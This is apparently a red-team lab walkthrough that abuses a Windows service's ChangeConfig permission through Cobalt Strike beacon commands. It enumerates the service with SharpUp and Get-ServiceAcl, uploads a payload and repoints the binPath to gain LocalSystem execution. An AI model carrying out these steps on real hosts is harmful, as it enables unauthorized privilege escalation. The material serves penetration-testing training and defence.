When a Windows service has weak permissions such as ChangeConfig for all authenticated users, attacker can escalate privileges by pointing the service binary path to a payload.

To look for weak service permissions in Cobalt Strike:

beacon> execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices
 
=== Modifiable Services ===
 
    Service 'VulnService2' (State: Running, StartMode: Auto)

SharpUp does not provide details on actual permissions, which we can get manually with Get-ServiceAcl:

beacon> powershell-import C:\Tools\Get-ServiceAcl.ps1
beacon> powershell Get-ServiceAcl -Name VulnService2 | select -expand Access
 
ServiceRights     : ChangeConfig, Start, Stop
AccessControlType : AccessAllowed
IdentityReference : NT AUTHORITY\Authenticated Users
IsInherited       : False
InheritanceFlags  : None
PropagationFlags  : None

For OPSEC purposes, we want to note the original service path so that we can restore it later:

beacon> run sc qc VulnService2
[SC] QueryServiceConfig SUCCESS
 
SERVICE_NAME: VulnService2
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\Vulnerable Services\Service 2.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : VulnService2
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

A simple reconfiguration and upload of a Cobalt Strike payload does the trick:

beacon> mkdir C:\Temp
beacon> cd C:\Temp
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
 
beacon> run sc config VulnService2 binPath= C:\Temp\tcp-local_x64.svc.exe
[SC] ChangeServiceConfig SUCCESS